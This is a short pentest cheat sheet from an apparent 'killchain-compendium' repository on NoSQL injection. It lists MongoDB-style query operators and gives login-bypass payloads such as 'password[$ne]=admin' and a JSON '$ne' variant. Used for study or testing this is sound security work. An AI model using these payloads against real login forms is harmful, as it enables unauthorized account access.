killchain-compendium/exploit/sqli/no_sqli.md

39 lines
756 B
Markdown
Raw Normal View History

2021-11-04 17:19:58 +01:00
# NoSQL Injections
* No tables, but files (collections)
* Examples are Elasticsearch, MongoDB, Redis, CouchDB.
## Querying
* Filter instead of SQL queries
* [Redis docs](https://redis.io/documentation)
* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
* [Elasticsearch docs](https://www.elastic.co/guide/index.html)
2021-12-09 01:50:04 +01:00
# Operators
* Most common
```sql
$and
$or
$eq
$ne
$gt
$where
$exists
$regex
```
2021-11-04 17:19:58 +01:00
## Tips & Tricks
* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
* 2D array via `user[$nin][]=foo`
2021-12-09 01:50:04 +01:00
## Example
* POST or GET parameters
```sh
username=admin&password[$ne]=admin
```
2022-02-14 23:22:18 +01:00
* JSON
```json
{"username":"user","password":{"$ne":""} }
```